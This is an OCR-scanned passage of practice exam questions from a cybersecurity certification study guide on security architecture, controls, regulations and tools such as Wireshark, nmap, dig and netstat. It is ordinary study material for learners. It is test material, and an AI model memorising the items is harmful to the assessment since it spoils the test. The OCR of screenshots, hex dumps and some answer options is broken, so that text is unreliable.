Internal 
Network 





Internet 
Internal network 
DMZ 


New network connected to the firewall 


99 9 > 


12. Ursula is considering redesigning her network to use a dual firewall approach, such as the 
one shown here. Which one of the following is an advantage of this approach over a triple- 
homed firewall? 







Border Router Age 


. Internal 
maw Network 






Web, DNS, and Email Servers 


A. Increased redundancy 


B. Decreased cost 


13. 


14. 


15. 


16. 


17. 
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C. Hardware diversity 

D. Simplified administration 

Which one of the following security activities is not normally a component of the opera- 
tions and maintenance phase of the SDLC? 

A. Vulnerability scans 

B. Disposition 

C. Patching 

D. Regression testing 

Tim is the CIO of a midsize company and is concerned that someone on the IT team may 
be embezzling funds from the organization by modifying database contents in an unau- 


thorized fashion. What group could investigate this providing the best balance between 
cost, effectiveness, and independence? 


A. Internal assessment by the IT manager 

B. Internal audit 

C. External audit 

D. Law enforcement 

Chelsea recently accepted a new position as a cybersecurity analyst for a privately held 


bank. Which one of the following regulations will have the greatest impact on her cyberse- 
curity program? 


A. HIPAA 
B. GLBA 
C. FERPA 
D. SOX 


Emily is charged with the security of her organization’s website. After a conversation with 
her manager, Emily learned that the organization’s highest priority for her work is the 
availability of the website in the event of an equipment failure. Which one of the following 
controls would be most effective in meeting this objective? 


A. RAID 

B. Web application firewall 

C. Load balancing 

D. Intrusion prevention systems 

Catherine is responding to a request for materials from auditors who will be reviewing her 
organization’s security. She received a request for a list of physical security controls used to 


protect her organization’s data center. Which one of the following controls does not meet 
this criteria? 


A. Fire suppression system 
B. Perimeter fence 

C. Exterior lighting 
D 


Visitor log reviews 
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18. Brandy works in an organization that is adopting the ITIL service management strategy. 
Which ITIL core activity includes security management as a process? 


A. Service strategy 


B. Service design 


C. Service transition 


D. Service operation 


19. 


Kyle is developing a web application that uses a database backend. He is concerned about 


the possibility of a SQL injection attack against his application and is consulting the 
OWASP proactive security controls list to identify appropriate controls. Which one of the 
following OWASP controls is least likely to prevent a SQL injection attack? 


A. Parameterize queries. 


B. Validate all input. 


C. Encode data. 


D. Implement logging and intrusion detection. 


20. 


Alec is a cybersecurity analyst working on analyzing network traffic. He is using 


Wireshark to analyze live traffic, as shown here. He would like to reassemble all of the 
packets associated with the highlighted connection. Which one of the following options 
from the drop-down menu in the figure should he choose first in order to most easily 


achieve his goal? 


am a © 


RAKA R ea 


Æ Capturing from Wi-Fi: enO 


aaa 





Ñ | Apply a display filter ... <38 
Time 
0.000000 


0.000241 
0.021037 
0.021388 
0.042262 
0.042449 
0.072522 
0.072666 
0.093394 
0.093577 
0.114189 
0.114368 
0.134988 
0.135168 
0.155789 
0.155985 





[> 

Source 
209.85.147.125 
209.85.147.125 
10.36.19.226 
209.85.147.125 
10.36.19.226 
209.85.147.125 
10.36.19.226 
209.85.147.125 
10.36.19.226 
209.85.147.125 
10.36.19.226 
209.85.147.125 
10.36.19.226 
209.85.147.125 
10.36.19.226 
209.85.147.125 
10.36.19.226 


Destination 
10.36.19.226 


209.85.147.125 
10.36.19.226 
209.85.147.125 
10.36.19.226 
209.85.147.125 
10.36.19.226 
209.85.147.125 
10.36.19.226 
209.85.147.125 
10.36.19.226 
209.85.147.125 
10.36.19.226 
209.85.147.125 
10.36.19.226 
209.85.147.125 


Protocol 


Length Info 


5222 + 50636 [ACK] Seq=1 Ack=1 Win=221 Len=@ TSval=845189264 TSecr=413918712 


Mark/Unmark Packet M 
Ignore/Unignore Packet 32D 
Set/Unset Time Reference BT 
Time Shift... QET 
Packet Comment... XEC 


Edit Resolved Name 


Apply as Filter 
Prepare a Filter 
Conversation Filter 
Colorize Conversation 
SCTP 

Follow 


Copy 


Frame 2: 78 bytes on wire (624 bits), 78 bytes captured (624 bits) on interface @ 


Ethernet II, Src: Cisco_8f:ec:00 (00:1f:c9:8f:ec:00), Dst: Apple_87:8a:73 (98:e0:d' 


Internet Protocol Version 4, Src: 209.85.147.125, Dst: 10.36.19.226 


Transmission Control Protocol, Src Port: 5222, Dst Port: 50636, Seq: 1, Ack: 1, Lej 


Source Port: 5222 
Destination Port: 
[Stream index: @] 
[TCP Segment Len: 


Sequence number: 1 
Acknowledgment number: 1 


Header Length: 44 
Flags: 0x010 (ACK) 
Window size value: 


50636 


bytes 


221 


[Calculated window size: 221] 
[Window size scaling factor: -1 (unknown)] 
Checksum: @xc475 [unverified] 


[Checksum Status: 
Urgent pointer: @ 


Unverified] 


(relative sequence number) 
(relative ack number) 


Protocol Preferences 
Decode As... 
Show Packet in New Window 


q=1 Ack=1 Win=221 Len=0 TSval=845189264 TSecr=413918892.. 


Len=@ TSval=845189285 TSecr=413919134 


Len=@ TSval=845189306 TSecr=413919155 


Len=@ TSval=845189327 TSecr=413919175 


Len=@ TSval=845189357 TSecr=413919205 


Len=0 TSval=845189378 TSecr=413919225 


Len=@ TSval=845189399 TSecr=413919245 


Len=@ TSval=845189420 TSecr=413919265 


Options: (24 bytes), No-Operation (NOP), No-Operation (NOP), Timestamps, No-Operation (NOP), No-Operation (NOP), SACK 


[SEQ/ACK analysis] 


0000 
0012 
0020 


98 eð d9 87 8a 73 00 1f 
00 40 de 2a 00 00 2b 06 
13 e2 14 66 c5 cc 23 05 
0030 0 dd c4 75 00 00 01 01 
0049 e6 ac 01 01 05 Ga c3 b1 


c9 8f ec 00 08 00 45 00 
2e b5 d1 55 93 7d @a 24 
8c d7 c3 b1 20 5a b® 10 
08 ða 32 60 90 90 18 ab 
20 59 c3 b1 20 5a 





21. 


22. 


23. 
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Apply As A Filter 
Prepare A Filter 


Conversation Filter 
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Follow 

Which one of the following events is least likely to trigger the review of an organization’s 
information security program? 

A. Security incident 

B. Changes in compliance obligations 

C. Changes in team members 

D. Changes in business processes 

Gerry would like to find a physical security control that will protect his organization 
against an attack where an individual drives a vehicle through the glass doors on the front 


of the building. Which one of the following would be the most effective way to protect 
against this type of attack? 


A. Mantraps 
B. Security guards 
C. Bollards 


D. Intrusion alarm 


Roger is the CISO for a midsize manufacturing firm. His boss, the CIO, recently returned 
from a meeting of the board of directors where she had an in-depth discussion about 
cybersecurity. One member of the board, familiar with ISO standards in manufacturing 
quality control, asked if there was an ISO standard covering cybersecurity. Which stan- 
dard is most relevant to the director’s question? 


A. ISO 9000 

B. ISO 17799 
C. ISO 27001 
D. ISO 30170 


Questions 24-26 refer to the following scenario: 


24. 


Martin is developing the security infrastructure for a new business venture that his orga- 
nization is launching. The business will be developing new products that are considered 
trade secrets, and it is of the utmost importance that the plans for those products not fall 
into the hands of competitors. 


Martin would like to take steps to confirm the reliability of employees and avoid situations 
where employees might be susceptible to blackmail attempts to obtain the plans. Which 
one of the following controls would be most effective to achieve that goal? 


A. Firewall 

B. DLP system 

C. Background investigation 
D. 


Nondisclosure agreement 
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25. 


26. 


27. 


28. 


29. 


Chapter 4 = Domain 4: Security Architecture and Tool Sets 


Martin would like to install a network control that would block the potential exfiltration 
of sensitive information from the venture’s facility. Which one of the following controls 
would be most effective to achieve that goal? 


A. IPS 

B. DLP system 
C. Firewall 

D. IDS 


Several employees will need to travel with sensitive information on their laptops. Martin is 
concerned that one of those laptops may be lost or stolen. Which one of the following con- 
trols would best protect the data on stolen devices? 


A. FDE 

B. Strong passwords 
C. Cable lock 

D. IPS 


Nadine works for a company that runs an e-commerce website. She recently discovered a 
hacking website that contains password hashes stolen from another e-commerce site. The 
two sites have a significant number of common users. What user behavior creates signifi- 
cant risk for Nadine’s organization? 


A. Use of weak hash functions 

B. Reuse of passwords 

C. Unencrypted communications 

D. Use of federated identity providers 

Which one of the following systems is not normally considered a component of identity 
management infrastructure? 

A. HRsystem 

B. LDAP 

C. Provisioning engine 


D. Auditing system 


Which one of the following is not one of the four domains of COBIT control objectives? 
A. Plan and Organize 

B. Acquire and Implement 

C. Design and Secure 

D. Deliver and Support 


30. 


31. 


32. 


33. 


34. 
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Glenn is conducting a security assessment of his organization’s Active Directory—based 
identity and access management infrastructure. Which of the following services/protocols 
represents the greatest security risk to Glenn’s organization if used in conjunction with 
Active Directory? 


A. LDAPS 
B. ADFS 
C. NTLMvl1 


D. Kerberos 


Barney’s organization mandates fuzz testing for all applications before deploying them 
into production. Which one of the following issues is this testing methodology most likely 
to detect? 


A. Incorrect firewall rules 

B. Unvalidated input 

C. Missing operating system patches 

D. Unencrypted data transmission 

Lydia worked as a database administrator for her organization for several years before 
being hired by another internal group to serve as a software developer. During a recent 
user access review, the security team discovered that Lydia still had administrative rights 


on the database that were not needed for her current job. Which term best describes this 
situation? 


A. Privilege creep 

B. Security through obscurity 

C. Least privilege 

D. Separation of duties 

John is reviewing his organization’s procedures for applying security patches and is 


attempting to align them with best practices. Which one of the following statements is not 
a best practice for patching? 


A. Security patches should be applied as soon as possible. 

B. Patches should be applied to production systems first. 

C. Patches should be thoroughly tested for unintended consequences. 

D. Patches should follow a change management process. 

Gavin is tracing the activity of an attacker who compromised a system on Gavin’s net- 
work. The attacker appears to have used the credentials belonging to a janitor. After doing 
so, the attacker entered some strange commands with very long strings of text and then 


began using the sudo command to carry out other actions. What type of attack appears to 
have taken place? 


A. Privilege escalation 
B. Phishing 

C. Social engineering 
D 


Session hijacking 
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35. 


36. 


37. 


38. 


39. 
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Jose is concerned that his organization is falling victim to a large number of social engi- 
neering attacks. Which one of the following controls is least likely to be effective against 
these attacks? 


A. Network firewall 

B. Multifactor authentication 

C. Security awareness 

D. Content filtering 

Under the U.S. government’s data classification scheme, which one of the following is the 
lowest level of classified information? 

A. Private 

B. Top Secret 

C. Confidential 

D. Secret 

Eric leads a team of software developers and would like to help them understand the most 


important security issues in web application development. Which one of the following 
sources would provide Eric with the most useful resource? 


A. CVE 
B. CPE 
C- CCE 
D. OWASP 


Carol is running an nmap scan and is confused by the results. It appears that nmap is not 
scanning a port where she expects to find a running service. What ports does nmap scan if 
nothing is specified on the command line? 


A. 1-1024 

B. 1-65535 

C. Only ports listed in the nmap-services file 

D. Ports from 1-1024 and those listed in the nmap-services file 

Jeff is preparing a password policy for his organization and would like it to be fully com- 


pliant with PCI DSS requirements. What is the minimum password length required by PCI 
DSS? 


A. 7 characters 
B. 8 characters 
C. 10 characters 
D 


12 characters 


Chapter 4 = Domain 4: Security Architecture and Tool Sets 205 


40. Colin would like to implement a security control in his accounting department that is 
specifically designed to detect cases of fraud that are able to occur despite the presence of 
other security controls. Which one of the following controls is best suited to meet Colin’s 


41. 


42. 


43. 


need? 

A. Separation of duties 
B. Least privilege 

C. Dual control 

D. Mandatory vacations 


Roger is a cybersecurity analyst at a bank. He recently conducted a forensic analysis of 
the workstation belonging to an IT staff member who was engaged in illicit activity. Roger 
discovered that the employee was capturing and storing cookies from user sessions as they 
were sent between backend systems. What type of attack might the employee have been 


conducting? 

A. Privilege escalation 
B. Covert channel 

C. Session hijacking 
D. SQL injection 


Rob is an auditor reviewing the payment process used by a company to issue checks to 
vendors. He notices that Helen, a staff accountant, is the person responsible for creating 
new vendors. Norm, another accountant, is responsible for issuing payments to vendors. 
Helen and Norm are cross-trained to provide backup for each other. What security issue, 
if any, exists in this situation? 


A. 
B. 
C. 
D. 


Least privilege violation 
Separation of duties violation 
Dual control violation 


No issue 


Arnie is required to submit evidence from systems on his network to external legal counsel 
as part of a court case. What technology can he use to demonstrate that the copies of 
evidence he is producing are genuine? 


A. 


B. 
C. 
D 


Disk duplicator 
Hash function 


Cloud storage service 
Write blocker 
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45. 


46. 


47. 


48. 
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Bob is considering the deployment of OpenSSL in his environment and would like to 
select a secure cipher suite. Which one of the following ciphers should not be used with 
OpenSSL? 


A. DES 
B. AES 
C. RSA 
D. ECC 


Tammy is reviewing alerts from her organization’s intrusion prevention system and finds 
that there are far too many alerts to review. She would like to narrow down the results to 
attacks that had a high probability of success. What information source might she use to 
correlate with her IPS records to achieve the best results? 


A. Vulnerability scans 
B. Firewall rules 

C. Port scans 

D. IDS logs 


In the Sherwood Applied Business Security Architecture (SABSA), which view corresponds 
to the logical security architecture? 


A. Builder’s view 

B. Tradesman’s view 

C. Designer’s view 

D. Architect’s view 

Frank’s organization recently underwent a security audit that resulted in a finding that the 
organization fails to promptly remove the accounts associated with users who have left the 
organization. This resulted in at least one security incident where a terminated user logged 


into a corporate system and took sensitive information. What identity and access manage- 
ment control would best protect against this risk? 


A. Automated deprovisioning 

B. Quarterly user account reviews 

C. Separation of duties 

D. Two-person control 

Jay is the CISO for his organization and is responsible for conducting periodic reviews of 
the organization’s information security policy. The policy was written three years ago and 


has undergone several minor revisions after audits and assessments. Which one of the fol- 
lowing would be the most reasonable frequency to conduct formal reviews of the policy? 


A. Monthly 

B. Quarterly 
C. Annually 
D 


Every five years 
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49. Alvin is working with a new security tool, as shown here. This tool collects information 
from a variety of sources and allows him to correlate records to identify potential security 
issues. What type of tool is Alvin using? 


WELCOME GUEST | DEMOB 172.31.33.220 | SETTINGS SUPPORT LOGOUT 


oul KX L El X 


DASHBOARDS ANALYSIS ENVIRONMENT REPORTS CONFIGURATION 
OVERVIEW 


EXECUTIVE TICKETS SECURITY TAXONOMY 


TOP 10 PROMISCUOUS HOSTS ? SECURITY EVENTS: TOP 5 ALARMS ? SECURITY EVENTS: TOP 5 EVENTS 


194.152.52.110 
192.168.100.71 
192.168.100.64 
192.168.100.74 
192.168.100.66 
192.168.100.78 
192.195.204.1 1 


10.18.144.10 
192.168.100.29 
TOP 10 HOSTS WITH MULTIPLE EVENTS a? SECURITY EVENTS TREND: LAST DAY ? SECURITY EVENTS TREND: LAST WEEK 


192.168.100.64 
133.18.53.49 
221.229.172.108 
221.229.172.114 
192.168.100.74 
192.168.100.66 
192.168.100.65 
192.168.100.78 


104.156.240.173 


185.32.222.16 


4 9h 10h 11h 12h 13h 14h 15h 16h 17h 18h 19h 20h 21h 22h 23h Oh 100ct 110ct 120ct 130ct 14Oct 150Oct 160ct 
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50. Al is a cybersecurity analyst for a company that runs a website that allows public post- 
ings. Users recently began complaining that the website is showing them pop-up messages 
asking for their passwords that don’t seem legitimate. At the same time, there has been an 
uptick in compromised user accounts. What type of attack is likely occurring against Al’s 
website? 


A. SQL injection 

B. Cross-site scripting 

C. Cross-site request forgery 
D. Rootkit 
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Questions 51-53 refer to the following scenario: 


Travis is troubleshooting the firewall rulebase that appears here: 


Rule Action Protocol Source IP Source Port Destination IP Destination Port 
1 allow UDP any any 10.15.1.1 25 
2 block TCP any any 10.15.1.2 80 
3 allow TCP 10.20.0.0/16 any 10.15.1.2 80 
4 allow TCP any any 10.15.1.3 22 


51. Users are reporting that inbound mail is not reaching their accounts. Travis believes that 
rule 1 should provide this access. The organization’s SMTP server is located at 10.15.1.1. 
What component of this rule is incorrect? 


A. Protocol 
B. Source port 
C. Destination IP 
D. Destination port 
52. The firewall rule creators intended to block access to a website hosted at 10.15.1.2 except 


from hosts located on the 10.20.0.0/16 subnet. However, users on that subnet report that 
they cannot access the site. What is wrong? 


A. The protocol is incorrect. 
B. The rules are misordered. 
C. The source port is not specified. 
D. There is no error in the rule, and Travis should check for other issues. 
53. Rule 4 is designed to allow ssh access from external networks to the server located at 
10.15.1.3. Users are reporting that they cannot access the server. What is wrong? 
A. The protocol is incorrect. 
B. The rules are misordered. 
C. The destination port is incorrect. 
D. There is no error in the rule, and Travis should check for other issues. 
54. Carl does not have sufficient staff to conduct 24/7 security monitoring of his network. He 


wants to augment his team with a managed security operations center service. Which one 
of the following providers would be best suited to provide this service? 


A. MSSP 
B. lIaaS 
C. PaaS 
D. SaaS 


55. 


56. 


57. 


58. 


59. 
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Jan is designing an authorization scheme for his organization’s deployment of a new 
accounting system. He is considering putting a control in place that would require that 
two accountants approve any payment request over $100,000. What security principle is 
Ian seeking to enforce? 


A. Security through obscurity 

B. Least privilege 

C. Separation of duties 

D. Dual control 

Ryan is concerned about the possibility of a distributed denial-of-service attack against 


his organization’s customer-facing web portal. Which one of the following types of tests 
would best evaluate the portal’s susceptibility to this type of attack? 


A. Regression testing 

B. Load testing 

C. Integration testing 

D. User acceptance testing 

Hank would like to deploy an intrusion prevention system to protect his organization’s 
network. Which one of the following tools is least likely to meet his needs? 

A. Snort 


B. Burp 
C. Sourcefire 
D. Bro 


Which one of the following connection status messages reported by netstat indicates an 
active connection between two systems? 


A. ESTABLISHED 
B. LISTENING 

C. LAST_ACK 

D. CLOSE_WAIT 


Greg is investigating reports of difficulty connecting to the CompTIA website and runs 
a traceroute command. He receives the results shown here. What conclusion can Greg 
reach from these results? 


laptop:~: traceroute www.comptia.org 

traceroute to www.comptia.org (198.134.5.6), 64 hops max, 52 byte packets 

10.36.16.1 (10.36.16.1) 2.362 ms 1.317 ms 1.309 ms 

172.21.0.5 (172.21.0.5) 1.288 ms 1.400 ms 1.506 ms 

172.21.255.129 (172.21.255.129) 1.659 ms 1.777 ms 1.648 ms 

172.21.248.66 (172.21.248.66) 2.116 ms 2.123 ms 2.080 ms 
xe-0-0-4.404.rtr.1ll.indiana.gigapop.net (149.165.183.29) 7.361 ms 7.431 ms 7.649 ms 
lo-0.1.rtr.ictc.indiana.gigapop.net (149.165.255.1) 7.783 ms 7.732 ms 7.652 ms 
10ge12-S.corel.indi.he.net (184.105.35.193) 7.618 ms 8.314 ms 7.444 ms 
10ge7-16.core2.chil.he.net (184.105.64.170) 13.694 ms 13.868 ms 57.656 ms 
x0-a515-as2828. 10gigabitethernet3-5.core2.chil.he.net (184.105.38.114) 15.012 ms 14.801 ms 14.668 ms 
vb2001.rar3.chicago-il.us.xo.net (207.88.13.130) 14.867 ms 15.056 ms 14.963 ms 

11 216.156.16.199.ptr.us.xo.net (216.156.16.199) 14.789 ms 15.016 ms 15.017 ms 

12 216.55.11.62 (216.55.11.62) 16.522 ms 16.797 ms 16.519 ms 

13 * * * 

14 * * * 

15 * * * 

16 ** * 

17 www.comptia.org (198.134.5.6) 16.522 ms 16.797 ms 16.519 ms 


= 
SwWTOnouawnr 


210 Chapter 4 = Domain 4: Security Architecture and Tool Sets 


The web server appears to be up and running on the network. 
The *s in the results indicates a network failure on Greg’s network. 


The *s in the results indicates a network failure on the CompTIA network. 


99 9 > 


The *s in the results indicates a network failure between Greg’s network and the 
CompTIA network. 


Questions 60-64 refer to the following scenario: 


Tom connects to a website using the Chrome web browser. The site uses TLS 
encryption and presents the digital certificate shown here. 


E Starfield Services Root Certificate Authority - G2 


t E] Amazon Root CA 1 
t EQ Amazon 
L BP *nd.edu 


*nd.edu 


Certificate 
(Seembard 


os 


Issued by: Amazon 
Expires: Tuesday, March 6, 2018 at 7:00:00 AM Eastern Standard Time 


@ This certificate is valid 


Y Details 


Common Name 


Country 
Organization 
Organizational Unit 


Common Name 


Serial Number 
Version 
Signature Algorithm 


Parameters 


Not Valid Before 
Not Valid After 


Algorithm 
Parameters 
Public Key 
Exponent 
Key Size 
Key Usage 


Signature 


US 

Amazon 
Server CA 1B 
Amazon 


05 54 D6 BA 6F B7 87 DO SD 41 68 C1 48 8B 42 64 

3 

SHA-256 with RSA Encryption ( 1.2.840.113549.1.1.11 ) 
none 


Sunday, February 5, 2017 at 7:00:00 PM Eastern Standard Time 
Tuesday, March 6, 2018 at 7:00:00 AM Eastern Standard Time 


RSA Encryption ( 1.2.840.113549.1.1.1 ) 
none 

256 bytes : BO 5A 73 D5 F3 01 D7 4F ... 
65537 

2048 bits 

Encrypt, Verify, Wrap, Derive 


256 bytes : B9 C6 D8 1C E9 26 DC BA... 





60. Who created the digital signature shown in the last line of this digital certificate? 
A. Starfield Services 


B. Amazon 


61. 


62. 


63. 


64. 


65. 


66. 


Chapter 4 = Domain 4: Security Architecture and Tool Sets 211 


C. nd.edu 
D. RSA 


Which one of the following websites would not be covered by this certificate? 
A. nd.edu 

B. www.nd.edu 

C. www.business.nd.edu 


D. All of these sites would be covered by the certificate. 


What encryption key does the certificate contain? 
A. The website’s public key 

B. The website’s private key 

C. Tom’s public key 

D. ‘Tom’s private key 

After Tom initiates a connection to the website, what key is used to encrypt future com- 
munications from the web server to Tom? 

A. The website’s public key 

B. The website’s private key 

C. Tom’s public key 

D. The session key 


What cryptographic algorithm is used to protect communications between Tom and the 
web server that take place using the key identified in question 63? 


A. RSA 
B. SHA-256 
C. AES 


D. It is not possible to determine this information. 


Kaitlyn’s organization recently set a new password policy that requires that all passwords 
have a minimum length of 10 characters and meet certain complexity requirements. She 
would like to enforce this requirement for the Windows systems in her domain. What type 
of control would most easily allow this? 


A. Group Policy object 

B. Organizational unit 

C. Active Directory forest 

D. Domain controller 

Which one of the following security controls is designed to help provide continuity for 
security responsibilities? 

A. Succession planning 

B. Separation of duties 

C. Mandatory vacation 
D 


Dual control 
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67. 


68. 


69. 


70. 


71. 


72. 
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Gwen would like to deploy an intrusion detection system on her network but does not 
have funding available to license a commercial product. Which one of the following is an 
open source IDS? 


A. Sourcefire 

B. Bro 

C. TippingPoint 

D. Proventia 

John is planning to deploy a new application that his company acquired from a vendor. He 
is unsure whether the hardware he selected for the application is adequate to support the 


number of users that will simultaneously connect during peak periods. What type of test- 
ing can help him evaluate this issue? 


A. User acceptance testing 

B. Load testing 

C. Regression testing 

D. Fuzz testing 

Tammy would like to ensure that her organization’s cybersecurity team review the archi- 


tecture of a new ERP application that is under development. During which SDLC phase 
should Tammy expect the security architecture to be completed? 


A. Analysis and requirements definition 

B. Design 

C. Development 

D. Testing and integration 

Which one of the following items is not normally included in a request for an exception to 
security policy? 

A. Description of a compensating control 

B. Description of the risks associated with the exception 

C. Proposed revision to the security policy 

D. Business justification for the exception 

Mike’s organization adopted the COBIT standard, and Mike would like to find a way to 


measure their progress toward implementation. Which one of the following COBIT com- 
ponents is useful as an assessment tool? 


A. Process descriptions 
B. Control objectives 
C. Management guideline 


D. Maturity models 


What policy should contain provisions for removing user access upon termination? 
A. Data ownership policy 


B. Data classification policy 
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C. Data retention policy 


D. Account management policy 


73. Suzanne is the CISO at a major nonprofit hospital group. Which one of the following regu- 
lations most directly covers the way that her organization handles medical records? 


A. HIPAA 
B. FERPA 
C. GLBA 
D. SOX 


Questions 74-76 refer to the following scenario: 


Karen is the CISO of a major manufacturer of industrial parts. She is currently performing 
an assessment of the firm’s financial controls, with an emphasis on implementing security 
practices that will reduce the likelihood of theft from the firm. 


74. Karen would like to ensure that the same individual is not able to both create a new 
vendor in the system and authorize a payment to that vendor. She is concerned that an 
individual who could perform both of these actions would be able to send payments to 
false vendors. What type of control should Karen implement? 


A. Mandatory vacations 
B. Separation of duties 
C. Job rotation 
D. Two-person control 
75. The accounting department has a policy that requires the signatures of two individuals on 
checks valued over $5,000. What type of control do they have in place? 
A. Mandatory vacations 
B. Separation of duties 
C. Job rotation 
D. Two-person control 
76. Karen would also like to implement controls that would help detect potential malfeasance 


by existing employees. Which one of the following controls is least likely to detect 
malfeasance? 


A. Mandatory vacations 
B. Background investigations 
C. Job rotation 
D. Privilege use reviews 
77. Johann is troubleshooting a network connectivity issue and would like to determine the 


path that packets follow from his system to a remote host. Which tool would best assist 
him with this task? 


A. ping 
B. netstat 
C. tracert 


D. ipconfig 
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78. Kyle runs the netstat command on a Linux server and sees the results shown here. Which 
one of the folllowing services is being used for an active remote connection to this server? 


Active Internet connections (servers and established) 


Proto Recv-Q Send-Q Local Address Foreign Address State 

tcp ® O *:ssh *i* LISTEN 

tcp ® O localhost:smtp *i* LISTEN 

tcp e O *:mysql kik LISTEN 

tcp 1’) 252 ip-172-30-0-60.ec2.inte:ssh 1 236.174:53623 ESTABLISHED 
tcp ® O *:http *i* LISTEN 

tcp 1) O *:ssh *I* LISTEN 

tcp 0 ® *:https Eak LISTEN 

tcp e ® ip-172-30-0-60.ec2.int:http ::ffff:: .236.174:53632 ESTABLISHED 
tcp ® ® ip-172-30-0-60.ec2.int:http ::ffff:: -236.174:53634 TIME_WAIT 
tcp i’) ® ip-172-30-0-60.ec2.int:http ::ffff:: .236.174:53633 ESTABLISHED 
udp ® ® *:bootpc kek 

udp ts) ® ip-172-30-0-60.ec2.inter:ntp *:* 

udp ® © localhost:ntp wom 

udp (] 0 *:ntp kik 

Active UNIX domain sockets (servers and established) 

Proto RefCnt Flags Type State I-Node Path 

unix 2 [ ACC ] STREAM LISTENING 10473 /var/lib/mysql/mysql.sock 

unix 2 [ ACC ] STREAM LISTENING 9227  /var/run/lvm/lvmetad.socket 
unix 2 [ ACC ] STREAM LISTENING 9242 /var/run/lvm/lvmpolld.socket 
unix 2 [ ACC J STREAM LISTENING 8423 @/com/ubuntu/upstart 

unix 2 [ ACC ] STREAM LISTENING 9876  /var/run/acpid.socket 

unix 2 [ ACC ] SEQPACKET LISTENING 8693 @/org/kernel/udev/udevd 

unix 2 { ACC J STREAM LISTENING 9792 /var/run/dbus/system_bus_socket 
unix 10 { ] DGRAM 9706 /dev/log 

unix 2 { ] DGRAM 10643 

unix 3 { ] STREAM CONNECTED 9796 

unix 3 { ] STREAM CONNECTED 107364 

unix 2 { ] DGRAM 11674 

unix 2 LJ DGRAM 10530 

unix 2 { ] DGRAM 10551 

unix 2 { ] DGRAM 13676 

unix 3 { ] STREAM CONNECTED 9795 

unix 3 { ] STREAM CONNECTED 107365 

unix 2 { ] DGRAM 107361 

unix 2 { ] DGRAM 9873 

unix 3 { ] STREAM CONNECTED 9653 

unix 3 { ] DGRAM 8701 

unix 3 { ] DGRAM 8702 

unix 3 { ] STREAM CONNECTED 9801 /var/run/dbus/system_bus_socket 
unix 3 { ] STREAM CONNECTED 9800 

unix 2 { ] DGRAM 10241 

unix 3 { ] STREAM CONNECTED 9654 


[ec2-user@ip-172-30-0-60 ~]$ I 





A. SSH 
B. HTTPS 
C. MySQL 
D. NIP 
79. Which one of the following statements about web proxy servers is incorrect? 
A. Web proxy servers decrease the speed of loading web pages. 
B. Web proxy servers reduce network traffic. 
C. Web proxy servers can filter malicious content. 
D. Web proxy servers can enforce content restrictions. 
80. Bruce is concerned about access to the master account for a cloud service that his company 


uses to manage payment transactions. He decides to implement a new process for multifac- 
tor authentication to that account where an individual on the IT team has the password 

to the account, while an individual in the accounting group has the token. What security 
principle is Bruce using? 


A. Dual control 
B. 


Separation of duties 


C. 
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Least privilege 


D. Security through obscurity 


81. Lorissa is investigating a potential DNS poisoning attack and uses the dig command to 
look up the IP address associated with the CompTIA.org website. She receives the results 
shown here. Which statement is true about these results? 


82. 


83. 


(08:35:51 Sdig comptia.org 


; <<>> DiG 9.8.3-P1 <<>> comptia.org 

;; global options: +cmd 

;; Got answer: 

;; —>>HEADER<<- opcode: QUERY, status: NOERROR, id: 27169 

7; flags: qr rd ra; QUERY: 1, ANSWER: 1, AUTHORITY: @, ADDITIONAL: @ 


;; QUESTION SECTION: 
;comptia.org. IN A 


;; ANSWER SECTION: 
comptia.org. 58 IN A 198.134.5.6 


;; Query time: 27 msec 

;; SERVER: 172.30.25.8#53(172.30.25.8) 
;; WHEN: Sat Aug 26 08:35:54 2017 

;; MSG SIZE rcvd: 45 


The DNS query was answered by a server located at 198.134.5.6, which is not 
authoritative for the domain. 


The DNS query was answered by a server located at 198.134.5.6, which is 
authoritative for the domain. 


The DNS query was answered by a server located at 172.30.25.8, which is not 
authoritative for the domain. 


The DNS query was answered by a server located at 172.30.25.8, which is 
authoritative for the domain. 


Which of the following protocols is best suited to provide authentication on an open network? 


A. 
B. 
C. 
D. 


TACACS 
RADIUS 
TACACS+ 


Kerberos 


Eric is assessing the security of a Windows server and would like assistance with identify- 
ing the users who have access to a shared file directory. What Sysinternals tool can assist 
him with this task? 


A. 


B. 
C. 
D 


AutoRuns 
SDelete 
Sysmon 


AccessEnum 
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85. 


86. 


87. 


88. 
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What identity management protocol is typically paired with OAuth2 to provide authenti- 
cation services in a federated identity management solution on the Web? 


A. Kerberos 


B. ADFS 
C. SAML 
D. OpenID 


Laura is working on improving the governance structures for enterprise architecture in her 
organization in an effort to increase the communication between the architects and the 
security team. In the TOGAF framework, which of the four domains is Laura operating? 


A. Business architecture 

B. Applications architecture 

C. Data architecture 

D. Technical architecture 

Rob is planning the security testing for a new service being built by his organization’s IT 


team. He would like to conduct rigorous testing of the finished product before it is released 
for use. Which environment would be the most appropriate place to conduct this testing? 


A. Development 

B. Test 

C. Staging 

D. Production 

Colin would like to find a reputable source of information about software vulnerabilities 


that was recently updated. Which one of the following sources would best meet his needs? 
A. OWASP 


B. SANS 
C. Microsoft 
D. Google 


Lou would like to deploy a SIEM in his organization, but he does not have the funding 
available to purchase a commercial product. Which one of the following SIEMs uses an 
open source licensing model? 


A. AlienVault 
B. QRadar 
C. ArcSight 
D. OSSIM 


89. 


90. 


91. 


92. 


93. 
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Bruce is considering the acquisition of a software testing package that allows programmers 
to provide their source code as input. The package analyzes the code and identifies any 
potential security issues in the code based upon that analysis. What type of analysis is the 
package performing? 


A. Static analysis 

B. Fuzzing 

C. Dynamic analysis 

D. Fault injection 

Tim is tasked with implementing multifactor authentication to bring his organization into 


compliance with an industry security regulation. Which one of the following combinations 
of systems would make the strongest multifactor authentication solution? 


A. Password and security question answers 
B. Fingerprint and retinal scan 

C. ID badge and PIN 

D. Password and PIN 


In the Sherwood Applied Business Security Architecture (SABSA), which view corresponds 
to the physical security architecture layer? 


A. Architect’s view 
B. Designer’s view 
C. Builder’s view 

D. Tradesman’s view 


Which one of the following Sysinternals tools may be used to determine the permissions 
that individual users have on a Windows registry key? 


A. Sysmon 

B. AccessEnum 
C. AutoRuns 

D. ProcDump 


Amy is creating application accounts for her company’s suppliers to use to access an inven- 
tory management website. She is concerned about turnover at the vendor. Which one of 
the following approaches would provide a good balance of security and usability for Amy? 


A. Amy should create a single account for the vendor and require the password be 
changed whenever an employee with knowledge of the password leaves the vendor. 


B. Amy should create individual accounts for each vendor employee and require that the 
vendor inform her when an employee leaves. 


C. Amy should create individual accounts for each vendor employee and require that the 
vendor immediately change the password for the account of any employee who leaves. 


D. Amy should create a master account for a responsible individual at the vendor and 
allow them to create and manage individual user accounts. 
